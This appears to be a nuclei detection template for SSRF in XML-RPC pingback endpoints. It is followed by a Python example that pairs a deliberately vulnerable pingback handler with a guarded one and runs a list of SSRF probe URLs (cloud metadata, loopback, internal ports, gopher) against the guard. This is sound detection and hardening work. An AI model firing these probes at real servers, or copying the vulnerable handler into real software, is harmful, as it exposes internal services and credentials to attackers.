id: xmlrpc-pingback-ssrf

info:
  name: XMLRPC Pingback SSRF
  author: geeknik
  severity: high
  description: An XML-RPC pingback.ping endpoint fetches the caller-supplied sourceURI without validation, which leads to SSRF. The template supplies an interactsh URL as the source and matches on the resulting out-of-band HTTP callback.
  reference:
    - https://hackerone.com/reports/406387
  metadata:
    max-request: 1
  tags: xmlrpc,hackerone,ssrf,generic

http:
  - raw:
      - |
        POST /xmlrpc/pingback HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

        <?xml version="1.0" encoding="UTF-8"?>
        <methodCall>
          <methodName>pingback.ping</methodName>
          <params>
            <param>
              <value><string>http://{{interactsh-url}}</string></value>
            </param>
          </params>
        </methodCall>

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4b0a00483046022100b9c0df7388577f0b020d925d4faf1d98344d0fed6488b6d1500c5e703b0f54a0022100ce92f1150040cc336adbdbe2e31a4363e1973409b27ec81c125c172c155d2886:922c64590222798bb761d5b6d8e72950
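The template above only observes the symptom: the server fetches whatever sourceURI it is handed, so the interactsh host receives an HTTP request. The following is an added example, not part of the template or of the nuclei project, showing both sides of that exchange in Python: it builds the pingback.ping call, parses it as a server would, and places a deliberately vulnerable handler next to one guarded by a source-URI check (scheme, userinfo, port, and every resolved address must be globally routable). All hostnames, addresses and the FAKE_DNS table are constructed so the block runs offline; the hardened handler's resolver parameter is an assumption of this example, not a feature of any pingback implementation.

```python
"""Added example: pingback.ping client/server pieces plus an SSRF guard.
Not part of the nuclei template above. Hostnames and DNS answers are constructed."""
import ipaddress
import socket
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit


def build_pingback_body(source_uri: str, target_uri: str) -> bytes:
    """Client side: serialise pingback.ping(sourceURI, targetURI) as XML-RPC."""
    root = ET.Element("methodCall")
    ET.SubElement(root, "methodName").text = "pingback.ping"
    params = ET.SubElement(root, "params")
    for value in (source_uri, target_uri):
        param = ET.SubElement(params, "param")
        ET.SubElement(ET.SubElement(param, "value"), "string").text = value
    return b'<?xml version="1.0" encoding="UTF-8"?>' + ET.tostring(root)


def parse_pingback(body: bytes) -> tuple[str, str]:
    """Server side: extract (sourceURI, targetURI). stdlib ElementTree does not
    resolve external entities; a production endpoint should still use defusedxml."""
    root = ET.fromstring(body)
    if root.tag != "methodCall" or root.findtext("methodName") != "pingback.ping":
        raise ValueError("not a pingback.ping call")
    values = [s.text or "" for s in root.findall("./params/param/value/string")]
    if len(values) != 2:
        raise ValueError("pingback.ping takes exactly two string parameters")
    return values[0], values[1]


def dns_resolve(host: str) -> list[str]:
    """Default resolver: every address getaddrinfo returns. It also normalises
    tricks like '0x7f000001' or '2130706433' into the IP they really mean."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_safe_source(uri: str, resolve=dns_resolve) -> bool:
    """True only if fetching uri cannot reach non-public address space.
    The fetcher must connect to exactly the addresses checked here (no second
    lookup) and re-run this on every redirect, or rebinding and 30x hops reopen it."""
    try:
        parts = urlsplit(uri)
        port = parts.port                      # raises ValueError on junk ports
    except ValueError:
        return False
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    if parts.username is not None or parts.password is not None:
        return False                           # http://ok.example@10.0.0.5/
    if port not in (None, 80, 443):
        return False                           # no pingbacks to redis/ssh/etc.
    try:
        addrs = [ipaddress.ip_address(parts.hostname)]          # literal IP
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolve(parts.hostname)]
        except (OSError, KeyError, ValueError):
            return False                       # unresolvable: refuse, don't fetch
    if not addrs:
        return False
    for ip in addrs:
        if ip.version == 6 and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped                # ::ffff:127.0.0.1 -> 127.0.0.1
        if not ip.is_global or ip.is_multicast:
            return False                       # loopback, RFC1918, link-local, ...
    return True


def vulnerable_pingback(body: bytes, fetch) -> str:
    """What the template detects: fetch whatever sourceURI the caller supplied."""
    source, _target = parse_pingback(body)
    return fetch(source)


def hardened_pingback(body: bytes, fetch, resolve=dns_resolve) -> str:
    """Same handler with the guard in front of the fetch."""
    source, _target = parse_pingback(body)
    if not is_safe_source(source, resolve):
        raise PermissionError(f"refusing to fetch {source}")
    return fetch(source)


# Constructed DNS answers so the example runs offline.
FAKE_DNS = {
    "attacker.example": ["8.8.8.8"],           # ordinary public host
    "rebind.example": ["8.8.8.8", "10.0.0.5"], # one public and one internal answer
    "internal.example": ["127.0.0.1"],
}


def fake_resolve(host: str) -> list[str]:
    return FAKE_DNS[host]


def demo() -> dict[str, bool]:
    """Run the guard over the sourceURIs a tester typically tries."""
    probes = [
        "http://attacker.example/pingback",
        "http://rebind.example/",
        "http://internal.example/",
        "http://169.254.169.254/latest/meta-data/",
        "http://[::ffff:127.0.0.1]/",
        "http://attacker.example@internal.example/",
        "http://attacker.example:6379/",
        "gopher://attacker.example/_stats",
    ]
    return {p: is_safe_source(p, fake_resolve) for p in probes}
```

Only the first probe in demo() passes the guard; the rest are the usual SSRF pivots (internal host, split-horizon or rebinding answers, cloud metadata, IPv4-mapped loopback, userinfo confusion, non-web port, non-HTTP scheme). Blocking at the address level rather than by hostname is what makes the check robust: the template's interactsh URL is a perfectly ordinary public hostname, so a hostname denylist would not stop the probe, but neither would a public fetch by itself be the problem; the guard's job is to make sure a pingback can never be pointed inward.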